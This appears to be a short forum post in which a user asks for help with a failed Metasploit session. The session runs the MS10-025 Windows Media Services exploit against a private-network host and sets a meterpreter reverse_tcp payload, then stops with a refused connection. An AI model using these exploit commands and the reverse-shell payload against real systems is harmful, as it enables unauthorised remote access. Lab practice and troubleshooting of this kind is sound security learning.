- Code: Select all
msf > use windows/mmsp/ms10_025_wmss_connect_funnel
msf exploit(ms10_25_wmss_connect_funnel) > set RHOST 192.168.33.115
RHOST => 192.168.33.115
msf exploit(ms10_25_wmss_connect_funnel) > set LHOST 192.168.33.101
LHOST => 192.168.33.101
msf exploit(ms10_25_wmss_connect_funnel) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_25_wmss_connect_funnel) > exploit
[*] Started reverse handler on 192.168.33.101:4444
[-] Exploit exception: The connection was refused by the remote host (192.168.33.115:1755)
[*]Exploit compleated: No session was started
Thanks for any and all help!



